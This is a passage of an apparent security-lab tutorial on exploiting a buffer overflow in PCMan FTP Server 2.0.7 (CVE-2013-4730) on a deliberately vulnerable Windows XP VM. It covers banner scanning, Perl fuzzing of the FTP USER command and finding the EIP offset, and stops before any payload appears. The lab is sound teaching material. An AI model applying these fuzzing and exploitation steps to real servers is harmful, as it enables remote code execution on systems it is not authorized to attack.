Lesson 1)
{ PCMan's FTP Server 2.0.7 Buffer Overflow
Explained }
Section 0. Background
Information |
- What is Damn Vulnerable Windows XP?
- This is a Windows XP Virtual Machine that
provides a practice environment to conduct ethical penetration
testing, vulnerability assessment, exploitation and forensics
- The Microsoft Software License Terms for
the IE VMs are included in the release
- By downloading and using this
software, you agree to these license
- What is PCMan
FTP Server?
- PCMan's FTP Server is a free software
mainly designed for beginners not familiar with how to set up a basic
FTP. Configuration is made very easy. Consequently, functionality
and security are not major concerns. Accordingly, the following
exploit (CVE-2013-4730)
- What is
the PCMan FTP Server 2.0.7 Buffer Overflow Exploit?
- The CVE Vulnerability number is
- Buffer overflow in PCMan's FTP Server 2.0.7
allows remote attackers to execute arbitrary code via a long string in a
USER command.
- Implementing the
CVE-2013-4730 with PCMan FTP Server 2.0.7
- The following lesson will show you step by
step (1) How to discover how many bytes it would take to crash PCMan, (2)
How to
determined the offset, which is number of bytes necessary to occur
before the EIP can be over overwritten, (3) How to extract a good JMP
ESP static memory location from SHELL32.dll, (4) How to established control
of the EIP, (5) How to test the hexadecimal sequence list for bad
characters, (6) How to create a payload, (7) How to encode the payload
in perl output, and (8) How to successfully overflow the buffer and
place the payload into memory thus allowing us to connect remotely with
- References
- Special Thanks!!!
- I wanted to thank
Master Peleus(@0x42424242)for
his original PCMan Buffer
Overflow Article in which this lesson is based upon.
- I wanted to thank Master
for providing the blueprints and working with me step by step. Boston
College is very lucky to have a Computer Science Student of your caliber.
- Pre-Requisite
Lab Notes
- In this lab we will do the following:
- Using fuzzing to determine the crash
point of PCMan.
- Using fuzzing, pattern_create.rb, and
pattern_offset.rb to determine the offset.
- How to overwrite the EIP.
- How to extract a JMP ESP static memory
location and place it in the EIP, thus taking control of the EIP.
- How to test the sequential hexadecimal
sequence list for bad characters.
- How to create a payload with msfpayload.
- How to encode a payload in perl format
with msfencode.
- How to craft perl script to implement a
buffer overflow, which includes injecting the payload in memory to
allow a remote connection with netcat.
- Legal Disclaimer
- As a condition of your use of this Web
site, you warrant to computersecuritystudent.com that you will not use
this Web site for any purpose that is unlawful or
that is prohibited by these terms, conditions, and notices.
- In accordance with UCC § 2-316, this
product is provided with "no warranties, either express or implied." The
information contained is provided "as-is", with "no guarantee of
- In addition, this is a teaching website
that does not condone malicious behavior of
any kind.
- You are on notice, that continuing
and/or using this lab outside your "own" test environment
is considered malicious and is against the law.
- © 2016 No content replication of any
kind is allowed without express written permission.
Section 1: Log into
Damn Vulnerable WXP-SP2 |
- Open VMware Player on your windows machine.
- Instructions:
- Click the Start Button
- Type "vmware player" in the search box
- Click on VMware Player

- Edit Virtual Machine Settings
- Instructions:
- Click on Damn Vulnerable WXP-SP2
- Edit Virtual Machine Settings
- Note:
- Before beginning a lesson it is
necessary to check the following VM settings.
- Set Network Adapter
- Instructions:
- Click on Network Adapter
- Click on the radio button "Bridged:
Connected directly to the physical network".
- Click the OK Button
- Start Up Damn Vulnerable WXP-SP2.
- Instructions:
- Start Up your VMware Player
- Play virtual machine
- Logging into Damn Vulnerable WXP-SP2.
- Instructions:
- Click on Administrator
- Password: Supply Password
- Press <Enter> or Click the Arrow
- Note(FYI):
- Password was created in (Lab
1, Section 1, Step 8)
- Open the Command Prompt
- Instructions:
- Click the Start Button
- All Programs --> Accessories -->
Command Prompt
- Obtain Damn Vulnerable WXP-SP2's IP Address
- Instructions:
- ipconfig
- Record Your IP Address
- Note(FYI):
- In my case, Damn Vulnerable WXP-SP2's
IP Address
- This is the IP Address of the
Victim Machine.

Section 2: Configure Kali Virtual Machine Settings |
- Open VMware Player on your windows machine.
- Instructions:
- Click the Start Button
- Type "vmware
player" in the search box
- Click on VMware Player

- Edit Virtual Machine Settings
- Instructions:
- Click on Kali
- Edit Virtual Machine Settings
- Note:
- Before beginning a lesson it is
necessary to check the following VM settings.
- Configure CD/DVD
- Instructions:
- Click on CD/DVD (IDE)
- Click on the radio button "Use
physical drive:"
- Select Auto detect

- Set Network Adapter
- Instructions:
- Click on Network Adapter
- Click on the radio button "Bridged:
Connected directly to the physical network".
- Click the OK Button
Section 3: Play and Login to Kali |
- Start Up Kali
- Instructions:
- Click on Kali
- Play virtual machine
- Supply Username
- Instructions:
- Click Other...
- Username:
- Click the Log In Button
- Supply Password
- Instructions:
- Password: <Provide you Kali root
- Click the Log In Button
- Open a Terminal Window
- Instructions:
- Click on Applications
- Accessories --> Terminal
- Obtain Kali's IP Address
- Instructions:
- ifconfig
- Record your IP Address
- Note(FYI):
- Arrow #1, ifconfig is used to display Kali's IP Address.
- Arrow #2, Record Your IP Address.
- Mine is
- Yours will probably be different.
Section 4: Initial
Directory Setup And Script Download |
- Open the Command Prompt (On Damn Vulnerable WXP-SP2)
- Instructions:
- Click the Start Button
- All Programs --> Accessories -->
Command Prompt
- Create PCMan Artifact Directory
- Instructions:
- mkdir C:\BUFFER\PCMan
- Note(FYI):
- Arrow #1, Use (mkdir) to create
the following directory (C:\BUFFER\PCMan). This directory will
be used to same some lesson artifacts.

- Create PCMan Script Directory (On Kali 1.0.5)
- Instructions:
- mkdir /var/tmp/BUFFER/PCMan
- ls -ld /var/tmp/BUFFER/PCMan
- cd /var/tmp/BUFFER/PCMan
- Note(FYI):
- Arrow #1, Use (mkdir) to create
the following directory (/var/tmp/BUFFER/PCMan).
- Arrow #2, Use (ls -ld) to
display the directory(d) long listing for the following directory (/var/tmp/BUFFER/PCMan).
If you remove the (d) the contents of the directory will be
displayed as well.
- Arrow #3, Use (cd) to navigate
to change directory into the following directory (/var/tmp/BUFFER/PCMan).

- Download Fuzzer Perl Scripts
- Instructions:
- wget http://www.computersecuritystudent.com/SECURITY_TOOLS/BUFFER_OVERFLOW/WINDOWS_APPS/lesson1/fuzzer.tar.gz
- tar zxovf fuzzer.tar.gz
- Note(FYI):
- Arrow #1, Use (wget) to download
the perl scripts that we will eventually use for fuzzing purposes.
- Arrow #2, Use (tar) to unzip(z),
extract(x), file(f), don't restore ownerships(o), in verbose mode.

- Change Perl Script Permissions
- Instructions:
- chmod 700 *.pl
- ls -lrta
- Note(FYI):
- Arrow #1, Use (chmod) allow the
current owner (ie root) Read(4), Write(2), and Execute(1)
permissions to all perl script file that end in (*.pl).
- Arrow #2, Use (ls -lrta) to
display a long listing (-l) of files in reverse(r) order by time(t),
and show any hidden(a) files that start with a dot(.).

Section 5: PCMan's FTP Server 2:0:7
Exploit Review |
- Open Firefox (On Damn Vulnerable WXP-SP2)
- Instructions:
- Click the Start Button
- All Programs --> Mozilla Firefox

- PCMan 2.0.7 Buffer Overdue Description
- Instructions:
- Navigate to the following
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4730
- Note(FYI):
- Arrow #2, The first clue
of the description tells you the the remote attacker can execute
arbitrary code via a long string.
- Accordingly, your
question should be how long
do I make the string?
- Arrow #3, The second clue of the
description tells you that the remote attacker is attacking the
USER command.
- Subsequently, your
next question should be how
do we attack the USER command
with a long string.

Section 6: Normal
Usage of PCMan's FTP Server 2.0.7 |
- Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
- Instructions:
- Right Click on PCMANFTPD2
- Click on Open

- PCMan is Online
- Note(FYI):
- Arrow #1, Notice the FTP Server is

- Exit PCMan
- Instructions:
(See Picture)
- Click the Yes Button

Section 7: Basic FTP
Footprint Test |
- Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
- Instructions:
- Right Click on PCMANFTPD2
- Click on Open

- PCMan is Online
- Note(FYI):
- Notice the FTP Server is
- I apologize for the
repetitive starting and stopping of the FTP Server.
- But, Practice Makes

- Basic NMAP Scan (On Kali 1.0.5)
- Note(FYI):
- Replace (
with your Damn Vulnerable WXP-SP2 Address found in (Section 1, Step
- Instructions:
- nmap
- Notice that you can see
that FTP is running on Port 21
- Note(FYI):
- Arrow #1,
(nmap) to run a very basic footprint scan on the Damn Vulnerable
WXP-SP2 machine.
- Arrow #2,
It is great that we can see that FTP is running, but you should be asking
who is the vendor and what is the version.

- View Basic NMAP Scan Connection (On Damn Vulnerable WXP-SP2)
- Note(FYI):
- In my case, a User made a
connection from, which is the IP Address of my Kali
- Notice the connects and
disconnects within the same second. Accordingly, this is a
pretty good sign that somebody is scanning you.
- NMAP Version Banner Scan (On Kali 1.0.5)
- Note(FYI):
- Replace (
with your Damn Vulnerable WXP-SP2 Address found in (Section 1, Step
- Instructions:
- nmap -sV --script=banner
-p 21
- The banner displays
PCMan's FTP Server 2.0
- Note(FYI):
- Arrow #1, use
(nmap) to determine the version (-sV) of the service running on a
specific port(-p 21) and display the banner (--script=banner) if
- Arrow #2,
Notice how easy NMAP makes it to grab a banner, and through clever
covert flag automation, an attacker can easily crawl the internet
for vulnerable applications (ie., PCMan 2.0.7).

- View Banner NMAP Scan Connection (On Damn Vulnerable WXP-SP2)
- Note(FYI):
- Arrow #1, Now the we used NMAP to
invoke both version detection (-sV) and banner detection
(--script=banner); we see a lot of connects and disconnects.
- Arrow #2, Also, notice that NMAP is
trying to use the FTP HELP menu to potentially collect some

- Use Telnet (On Kali 1.0.5)
- Note(FYI):
- Replace (
with your Damn Vulnerable WXP-SP2 Address found in (Section 1, Step
- Instructions:
- telnet
- Notice the Banner is
display on the screen
- Press both the <Ctrl>
and Right Bracket(])
keys at the same time.
- quit
- Note(FYI):
- Arrow #1,
(telnet) to the IP (
port (21) to establish a TCP connection.
- Arrow #2,
Notice that you are also supplied the same banner that NMAP
supplies. Accordingly, this really old fashion technique is almost
normal traffic, the attacker is probably not as likely to set off as
many alarms. This is why you should turn off all banners on
any service that you are running.

- Exit PCMan
- Instructions:
(See Picture)
- Click the Yes Button

Section 8: PCMan
Fuzz Test (Part 1) |
- Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
- Instructions:
- Right Click on PCMANFTPD2
- Click on Open

- PCMan is Online
- Note(FYI):
- Notice the FTP Server is
- I apologize for the
repetitive starting and stopping of the FTP Server.

- Open fuzzer1.pl with leafpad (On Kali 1.0.5)
- Instructions:
- cd /var/tmp/BUFFER/PCMan
- leafpad fuzzer1.pl
- Note(FYI):
- Arrow #1,
Use (cd) to navigate to the (/var/tmp/BUFFER/PCMan) directory.
- Arrow #2,
Use (leafpad) to open (fuzzer1.pl). Leafpad is a simple GTK+
based text editor. The user interface is similar to Windows(tm)

- Explain fuzzer1.pl (Command Line Arguments) (On Kali 1.0.5)
- Instructions:
- Select Options and Check
Word Wrap
and Line
- Scroll Down to Line 17
- Note(FYI):
- Arrow #2,
The script (fuzzer1.pl) take in three command line arguments:
- Eg., ./fuzzer1.pl 21
- IPADDRESS - Is the IP Address
associated with the attack vector.
- PORT - Is the Port associated with the
attack vector server.
- COUNT - Is the number of
character that will be sent to the particular IPADDRESS and PORT.

- Explain fuzzer1.pl Essential Variables (On Kali 1.0.5)
- Instructions:
- Arrow #1 [Line 37],
The ($header)
variable is composed of the string (USER)
plus a single <SPACE>.
The characters that come after the (USER
) string is the actual username. (Eg.
- Arrow #2 [Line 42], The ($junk)
variable will actually contain the username that will be supplied
immediately after the $header. Ultimately, the $junk variable
will used to overflow the USER variable within PCMan.
- Normal Usage: E.g.,
- Ab-Normal Usage:
E.g., USER
- Arrow #3 [Line 46],
The ($string)
variable contains the Hexademical representation for an A (e.g.,
x41) multiplied by the OFFSET_COUNT.
In the below example, 2200 A's would be sent to PCMan.
- E.g., ./fuzzer1.pl 21 2200
- Arrow #4 [Line 49],
The ($socket)
variable is used to create a TCP connection to an $IPADDRESS over a
- Arrow #5 [Line 53],
The function
$socket->send($string) is used to send the $string composed
of (USER
to the specified $IPADDRESS and $PORT.
- Arrow #6 [Line 57],
The function
close($socket) will close the TCP connection.
- Arrow #7, Click the
icon to
close leafpad.

- PCMan Fuzz Test (Part 1) (On Kali 1.0.5)
- Note(FYI):
- Replace (
with your Damn Vulnerable WXP-SP2 Address found in (Section 1, Step
- Instructions:
- cd /var/tmp/BUFFER/PCMan
- ./fuzzer1.pl
- ./fuzzer1.pl
21 10
- ./fuzzer1.pl
21 100
- ./fuzzer1.pl
21 1000
- Note(FYI):
- Arrow #1,
Use (cd)
to navigate to the (/var/tmp/BUFFER/PCMan) directory.
- Arrow #2,
(fuzzer1.pl) to see which parameters are required for the program to
execute as designed. No buffer overflow will occur for
(Arrows #3-#5).
- ./fuzzer1.pl
- ./fuzzer1.pl
- Arrow #3,
(fuzzer1.pl) to send 10 A's to (
over port 21.
- Arrow #4,
(fuzzer1.pl) to send 100 A's to (
over port 21.
- Arrow #5,
(fuzzer1.pl) to send 1000 A's to
over port 21.

- Review of Initial Fuzzing Test (Part 1) (On Damn Vulnerable WXP-SP2)
- Instructions:
- Notice that 10's
were sent and the User name is okay.
- Notice that
100's were sent and the User name is okay.
- Notice that
1000's were sent and the User name is okay.
- Note(FYI):
- Arrows #1-#3,
goal of fuzzing is to find out the following: (1) at what point will
the application fail to work as designed, (2) at what point will the
application crash, and (3) at what point will the application allow
exploitation to occur.
- Accordingly, we are not
at that point yet.

- Exit PCMan
- Instructions:
(See Picture)
- Click the Yes Button
- Note(FYI):
- It is really not
necessary to exit PCMan at this point. The purpose of exiting
is to clear the application input and output streams.

Section 9: PCMan
Fuzz Test (Part 2) |
- Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
- Instructions:
- Right Click on PCMANFTPD2
- Click on Open

- PCMan is Online
- Note(FYI):
- Notice the FTP Server is

- PCMan Fuzz Test (Part 2) (On Kali 1.0.5)
- Note(FYI):
- Replace (
with your Damn Vulnerable WXP-SP2 Address found in (Section 1, Step
- Instructions:
- ./fuzzer1.pl
21 1500
- ./fuzzer1.pl
- Note(FYI):
- Arrow #1,
(fuzzer1.pl) to send 1500 A's to
over port 21. Notice, in the next step, the output is not much
different than before.
- Arrow #2,
(fuzzer1.pl) to send 1800 A's to
over port 21. Notice, in the next step, the output starts to

- Review of Initial Fuzzing Test (Part 2) (On Damn Vulnerable WXP-SP2)
- Instructions:
- Notice that
1500's were sent and the User name is okay.
- Notice that
1800's were sent and the User name is okay. But, now two
lines of output are displayed.
- Note(FYI):
- Arrow
#2, Now PCMan is starting to behave differently as we increase
the number of A's we send.

- Exit PCMan
- Instructions:
(See Picture)
- Click the Yes Button
- Note(FYI):
- It is really not
necessary to exit PCMan at this point. The purpose of exiting
is to clear the application.

Section 10: PCMan
Fuzz Test (Part 3) |
- Section Notes
- Notes(FYI):
- The goal of this section is to generate
enough characters to crash PCMan.
- Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
- Instructions:
- Right Click on PCMANFTPD2
- Click on Open

- PCMan is Online
- Note(FYI):
- Notice the FTP Server is

- PCMan Fuzz Test (Part 3) (On Kali 1.0.5)
- Note(FYI):
- Replace (
with your Damn Vulnerable WXP-SP2 Address found in (Section 1, Step
- Instructions:
- ./fuzzer1.pl
21 2200
- Note(FYI):
- Arrow #1,
(fuzzer1.pl) to send 2200 A's to
over port 21. Notice in the following step the application
has crashed.

- Review of the Initial Fuzzing Test (On Damn Vulnerable WXP-SP2)
- Note(FYI):
- Notice the message that
says PCMan has encountered a problem.
- Click on the Don't
Send button

Section 11: PCMan
Fuzz Test Using OllyDbg (Part 1) |
- Section Notes
- Notes(Objectives):
- The first objective of this section is to teach you how
to attach the OllyDbg Debugger to the PCMan Process.
- The second objective is to determine
the required number of characters to crash PCMan.
- The third objective is to illustrate
that just being able to determine the amount of characters to crash
an application is not equivalent to determinig the exact offset.
- Notes(Terms):
- The offset is number of
bytes necessary to occur before the EIP would be overwritten.
- The EIP
register contains the address of the next instruction to be
- All of this will make
sense as we continue. By the way, I am on my third cup of
Turkish coffee.
- Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
- Instructions:
- Right Click on PCMANFTPD2
- Click on Open

- PCMan is Online
- Note(FYI):
- Notice the FTP Server is
- I apologize for the
repetitive starting and stopping of the FTP Server.

- Instructions:
- Right Click on the
OLLYDBG Desktop Icon
- Select Open
- Attach OLLYDBG to PCMan Process (Part 1)
- Instructions:
- File --> Attach

- Attach OLLYDBG to PCMan Process (Part 2)
- Instructions:
- Click on PCManFTPD2
- Click on the Attach
- Note(FYI):
- Arrow #1, Make
sure PCManFTPD2 is highlighted in light gray.
- Arrow #2, OLLYDBG is an x86 debugger that will allow us to view and trace
memory locations, registers, determine offsets, determine which DLLs
are used, and a lot more.

- OllyDbg Views Briefly Explained
- Note(FYI):
- Arrow #1, The
upper left window pain represents assembler instructions being
executed by the program.
- Arrow #2, The
lower left window pain provides a map of Memory to Hex to ASCII.
- Arrow #3, The
upper right window pain represent registers that will help in our
future buffer overflow interrogation.
- Arrow #4, The
lower right window pain represents actual memory stack, which will
be used in conjunction with the Structured Exception Handler (SEH)

- Start OllyDbg
- Instructions:
- Notice that OllyDbg is currently paused
- Click the Play Icon (
and paused ( )
will change to running ( )
- Click PCMan located in the taskbar (
- Note(FYI):
- Arrow #1, PCMan is
kind of in a locked stated until the Play Icon is clicked.
- Arrow #3, You are
asked to click on PCMan in the task tray to bring the PCMan
application to foreground, so you can watch the subsequent buffer
overflow attempts.

- Open fuzzer2.pl (On Kali 1.0.5)
- Instructions:
- leafpad fuzzer2.pl
- Note(FYI):
- Arrow #1,
Use (leafpad) to open (fuzzer2.pl). Leafpad is a simple GTK+
based text editor. The user interface is similar to Windows(tm)

- View fuzzer2.pl Standard Input
- Instructions:
- Select Options and Check
Word Wrap
and Line
- Arrow #2 [Line 21],
This is a sub routine
called &get_info. It calls the program to move and execute the lines
of code between 24 to 53.
- Arrow #3 [Line 27],
The ($target)
variable receives user input pertaining to the IP Address.
- Arrow #4 [Line 30],
The ($port)
variable receives user input pertaining to the Port Number.
- Arrow #5 [Line 33],
The ($start_fuzz)
variable receives user input pertaining to the starting number of
characters sent to the PCMan USERNAME. (E.g., Start at 2000 AAAA's).
- Arrow #6 [Line 36],
The ($end_fuzz)
variable receives user input pertaining to the ending number of
characters sent to the PCMan USERNAME. (E.g., End at 3000 AAAA's).
- Note(FYI):
- Arrows #2-6,
<stdin> is a perl function used in this method to receive user input
data from the keyboard.

- Explain fuzzer2.pl (&comment Sub Routine)
- Instructions:
- Arrow #1 [Line 40],
any of the variables $target -or- $port -or- $start_fuzz -or- $end_fuzz
blank, THEN display usage and exit the program.
- Arrow #2 [Line 51],
the above statement in Line 40 is FALSE, THEN execute the
sub routine.
- Arrow #2 [Line 51-60],
Send the following variables ($target,$port,$start_fuzz,$end_fuzz)
to Line 55.
- Note(FYI):
- Arrows #3,
Notice the following:
- $target in Line 51 is
received $target in Line 57.
- $port in Line 51 is
received $port in Line 58
- $start_fuzz in Line 51 is
received $start_fuzz in Line 59
- $end_fuzz in Line 51 is
received $end_fuzz in Line 60

- Explain fuzzer2.pl (While Loop and Time Out)
- Instructions:
- Arrow #1 [Line 71],
Keep the program running inside of the while loop, IF a socket can
still be establish to the IP/Port -AND- IF the $end_fuzz count has
not been exceeded.
- The ($end_fuzz) is the amount of characters
that you want the program to stop at you were unable to crash the
- Arrow #2 [Line 75], Create a network TCP socket to IP($target) and Port($port).
The timeout is set to 1 second. It also correspond to my alarm
on line 83.
- Arrow #1 [Line
77,81-83], The ($buff_num) is the number of characters we previously sent the
application. If the socket times out, then we gently send a
signal (Line 83) to print (Line 82) that the application crashed.
- Note(FYI):
- Arrows #1-4,
The purpose of explaining the code is so you become proficient at
understanding how something works (whether it is primitive or not),
as opposed to only being a tool jockey. It's nice to have the
ability and confidence to write your own vulnerability scanner,
before having to wait the next day or paying big bucks to somebody

- Explain fuzzer2.pl (Socket Determination)
- Instructions:
- Arrow #1 [Line 92], IF
a TCP socket was established to IP($target) and Port($port), THEN
execute Lines 92 to 101.
- Arrow #2 [Line 100], Send the IP($target), Port($port), and the
FUZZER_COUNT($num) to the
fuzzer sub routine.
- Arrow #2 [Line
92,102-109], IF a TCP socket was NOT established to IP($target) and
Port($port), THEN exit the program.

- Explain fuzzer2.pl (Send Fuzzer String)
- Instructions:
- Arrow #1
[Line 122-124], Variables $target, $port, and $fuznum
received arguments from the sub routine
- Arrow #2
[Line 126], Assign the $header variable to "USER
- Arrow #3
[Line 130-132], Assign the $socket variable to the
IP($target) and Port($port). IF the $socket was created, THEN
move into the first set of curly braces{}.
- Arrow #4
[Line 134], Assign the $exploit variable to the product of the hexadecimal value
for A(x41) multiple by the $fuznum. So, if the $fuznum is
2200, then there would be 2200 A's(41) assigned to the $exploit
- Arrow #5
[Line 135], Assign the $string variable to "USER
- Arrow #6
[Line 137], Print or Send the $string to the $socket.
This is the line that will eventually cause a buffer overflow.
- Arrow #7 [Line 132,147-153], IF the $socket was not created, THEN
exit the program.
- Click the
icon to
close leafpad.
- Note(FYI):
- Arrows #1-6,
The purpose of this function is to test how many characters sent to
the PCMan USER variable is requiredto crash the application.

- PCMan Fuzz Test using fuzzer2.pl (On Kali 1.0.5)
- Note(FYI):
- Replace (
with your Damn Vulnerable WXP-SP2 Address found in (Section 1, Step
- Instructions:
- ./fuzzer2.pl
- Enter IP Address:
- Enter Port Number: 21
- Enter Fuzz Start Number:
- Enter Fuzz Stop Number:
- My crash number is
record your crash number
- Note(FYI):
- Arrow
#1, Use (fuzzer2.pl) to sequentially enumerate several buffer
overflow attempts, until PCMan crashes, in which OllyDbg will fail
back to Paused Mode.
- Arrow #4-#5, The
start (1999) and Stop (2020) Fuzz numbers where derived from Master
Peleus' article.
- Arrow #6, In my
case, the fuzzer was unable to communicate with PCMan after sending
2001 A's (ie., A = x41).

- Viewing OllyDbg Results (On Damn Vulnerable WXP-SP2)
- Instructions:
- Notice that OllyDbg is currently paused
) because
PCMan crashed.
- Notice the EBP register that contains
the string (41410002).
- See below Note(FYI) section for EPI
- Note(FYI):
- Arrow #2, The EBP
is a non-volatile general-purpose register that has two distinct
uses depending on compile settings: (1) it is either the frame
pointer or a (2) general purpose register. EBP keeps track of where
the stack is at the beginning of a function. In case, you can
see it was storing 2 bytes of AA's(41 41
00 02).
- Arrow #3, The EIP
register always contains the address of the next instruction to be
executed. Our goal over the next sections is to determine the
exact offset so we can control what is placed in the EIP. If we can accomplish this task, then we have a high
probability to be able to later tell the EIP (ie the pointer to the
next instruction) to execute our shell code instead of the
application immediately crashing. :-)

- Copy the EIP
- Instructions:
- Left Click to Highlight, then Right
Click on the EIP
- Click Copy selection to clipboard
- Click the Close Icon (

- Using pattern_offset.rb (On Kali 1.0.5)
- Note(FYI):
- Replace (0012FE44)
with your EIP value obtained in the previous step. You should
be able to paste if you have VMware Tools installed.
- Instructions:
- /usr/share/metasploit-framework/tools/pattern_offset.rb
- Notice the Offset was not
- Note(FYI):
- Arrow
#1, Use (pattern_offset.rb) to "try" to determine the exact length of the EIP address (0012FE44).
Remember the offset is
number of bytes necessary to occur before the EIP would be over
- Arrow #2, No exact
matches will occur because the address is invalid.
Accordingly, the following section will teach you how to determine
the offset, using a valid address.

Section 12: PCMan
Fuzz Test Using pattern_create.rb and pattern_offset.rb |
- Section Notes
- Notes(FYI):
- The previous section
provided you with a very primitive way to determine how many
character it takes to crash PCMan. However, just opening up
the virtual fire hose and pointing it at an application is not
accurate enough to determining the
buffer offset.
- Fortunately, the Metasploit framework has two
sister tools (pattern_create.rb and pattern_offset.rb) that allow us
precisely determine which 4
bytes will overwrite the EIP.
- PCMan Fuzz Test (On Kali 1.0.5)
- Instructions:
- /usr/share/metasploit-framework/tools/pattern_create.rb
2200 | tee pattern.txt
- ls -l pattern.txt
- Note(FYI):
- Arrow
#1, Use (pattern_create.rb) to create a unique pattern of 2200
characters. Instead of sending all (A's) to crash PCMan, we
will send this unique string instead. The result value
contained in the EIP register can then be used with
pattern_offset.rb to determine the exact offset. Use (tee) to
display the output and place that output in a file call (pattern.txt).
- Arrow
#2, Use (ls -l) to display the files general information
(privileges, ownerships, byte size, last update and name).

- Open fuzzer3.pl (On Kali 1.0.5)
- Instructions:
- leafpad fuzzer3.pl
- Note(FYI):
- Arrow #1,
Use (leafpad) to open (fuzzer3.pl). Leafpad is a simple GTK+
based text editor. The user interface is similar to Windows(tm)

- Explain fuzzer3.pl (Command Line Arguments)
- Instructions:
- Select Options and Check
Word Wrap
and Line
- Arrow #2 [Line 17-18],
Assign $IPADDRESS and $PORT to their corresponding command line
- Arrow #3, [Line 20-27],
IF either $IPADDRESS -or- $PORT was not provided via the command
line, THEN exit the program.

- Explain fuzzer3.pl (Does pattern.txt Exist)
- Instructions:
- Arrow #1 [Line 30-38],
IF the file (pattern.txt) that you created in
(Section 12, Step 1)
does not exit, THEN exit the program.
- Arrow #2, [Line 46],
Assign the ($header) variable to "USER
". In order to provide a username to a FTP server (ie
PCMan), you must first specify the string (USER
) followed by a <space>
and then the actual username.
- Arrow #3, [Line 52],
Use (cat) to assign the ($junk) variable to the entire string of characters located
in the file (pattern.txt). The ($junk) variable will actually
be the fake username that will follow the header string(USER
- E.g., $junk =
- Arrow #4, [Line 56],
Assign the ($string) variable to contain the combination of the ($header)
with the ($junk) variable appended.
- E.g., (USER

- View fuzzer3.pl (Establish Socket, Send Data)
- Instructions:
- Arrow #1 [Line 59],
Establish a TCP Network Socket Connection and assign to
the ($socket) variable.
- Arrow #2, [Line 63],
Use $socket->send($string)
to send the ($string) variable to the $socket TCP Network Connection.
- Arrow #3, [Line 63],
Use close($socket) to
close the $socket TCP Network Connection.
- Click the
icon to
close leafpad.

- Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
- Instructions:
- Right Click on PCMANFTPD2
- Click on Open

- PCMan is Online
- Note(FYI):
- Notice the FTP Server is
- I apologize for the
repetitive starting and stopping of the FTP Server.

- Instructions:
- Right Click on the
OLLYDBG Desktop Icon
- Select Open
- Attach OLLYDBG to PCMan Process (Part 1)
- Instructions:
- File --> Attach

- Attach OLLYDBG to PCMan Process (Part 2)
- Instructions:
- Click on PCManFTPD2
- Click on the Attach
- Note(FYI):
Arrow #1, Make
sure PCManFTPD2 is highlighted in light gray.
- Arrow #2, OLLYDBG is an x86 debugger that will allow us to view and trace
memory locations, registers, determine offsets, determine which DLLs
are used, and a lot more.

- Start OllyDbg
- Instructions:
- Notice that OllyDbg is currently paused
- Click the Play Icon (
and paused ( )
will change to running ( )
- Click PCMan located in the taskbar (
- Note(FYI):
- Arrow #1, PCMan is
kind of in a locked stated until the Play Icon is clicked.
- Arrow #3, You are
asked to click on PCMan in the task tray to bring the PCMan
application to foreground, so you can watch the subsequent buffer
overflow attempts.

- PCMan Fuzz Test Using fuzzer3.pl (On Kali 1.0.5)
- Note(FYI):
- Replace (
with your Damn Vulnerable WXP-SP2 Address found in (Section 1, Step
- Instructions:
- ./fuzzer3.pl
- Note(FYI):
- Arrow
#1, Use (fuzzer3.pl) to send the unique string of 2200
characters created by pattern_create.rb to PCMan.

- Viewing OllyDbg Results (On Damn Vulnerable WXP-SP2)
- Instructions:
- Notice that OllyDbg is currently paused
) because
PCMan crashed.
- Notice that both the ESP and ESI
register points to strings that contain a bunch of unique junk.
- Left
Click on the EIP Value, Right
Click to popup a menu.
- Copy Selection to clipboard.
- Click the Close Icon (
- Note(FYI):
- Arrow #3-4, Make
sure you copy your EIP value instead of mine. It's very possible
that yours will be different.

- Open Notepad
- Instructions:
- Click the Start Button
- All Programs --> Accessories -->

- Paste EIP Value
- Instructions:
- Edit --> Paste

- Save File
- Instructions:
- File --> Save As...
- Navigate to the following Folder
- File name: eip_value.txt
- Click the Save Button
- Note(FYI):
- We are saving the address just encase
you are unable to paste it in the next step.

- Using pattern_offset.rb (On Kali 1.0.5)
- Note(FYI):
- Replace (386F4337)
with your EIP value obtained in the
previous step. You should
be able to paste if you have VMware Tools installed.
- Instructions:
- /usr/share/metasploit-framework/tools/pattern_offset.rb
Record your Offset.
In my case, it is 2003.
- Note(FYI):
- Arrow
#1, Use (pattern_offset.rb) to determine the exact length of the
EIP address (386F4337).
- Arrow #2, Make
sure you record your offset. It is important to note that
2003 bytes occur (in my case)
before the EIP can be overwritten.

Section 13: PCMan -
Overwritting the EIP |
- Section Notes
- Notes(FYI):
- In the
previous section,
we determined that 2003 bytes
occur (in my case) before the EIP can be overwritten.
- In this section, we will
confirm that we can precisely overwrite the EIP.
- Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
- Instructions:
- Right Click on PCMANFTPD2
- Click on Open

- PCMan is Online
- Note(FYI):
- Notice the FTP Server is
- I apologize for the
repetitive starting and stopping of the FTP Server.

- Instructions:
- Right Click on the OLLYDBG Desktop Icon
- Select Open
- Attach OLLYDBG to PCMan Process (Part 1)
- Instructions:
- File --> Attach

- Attach OLLYDBG to PCMan Process (Part 2)
- Instructions:
- Click on PCManFTPD2
- Click on the Attach
- Note(FYI):
- Instruction #1, Make
sure PCManFTPD2 is highlighted in light gray.
- Instruction #2, OLLYDBG is an x86 debugger that will allow us to view and trace
memory locations, registers, determine offsets, determine which DLLs
are used, and a lot more.

- Start OllyDbg
- Instructions:
- Notice that OllyDbg is currently paused
- Click the Play Icon (
and paused ( )
will change to running ( )
- Click PCMan located in the taskbar (
- Note(FYI):
- Arrow #1, PCMan is
kind of in a locked stated until the Play Icon is clicked.
- Arrow #3, You are
asked to click on PCMan in the task tray to bring the PCMan
application to foreground so you can watch the subsequent buffer
overflow attempts.

- Open fuzzer4.pl (On Kali 1.0.5)
- Instructions:
- leafpad fuzzer4.pl
- Note(FYI):
- Arrow #1,
Use (leafpad) to open (fuzzer4.pl). Leafpad is a simple GTK+
based text editor. The user interface is similar to Windows(tm)

- Explaining fuzzer4.pl (Command Line Arguments)
- Instructions:
- Select Options and Check
Word Wrap
and Line
- Arrow #2 [Line 17-19],
Assign $IPADDRESS, $PORT and $COUNT to their corresponding command line
argument variables.
- Arrow #3, [Line 21-29],
IF either $IPADDRESS -or- $PORT -or- $COUNT was not provided via the command
line, THEN exit the program.

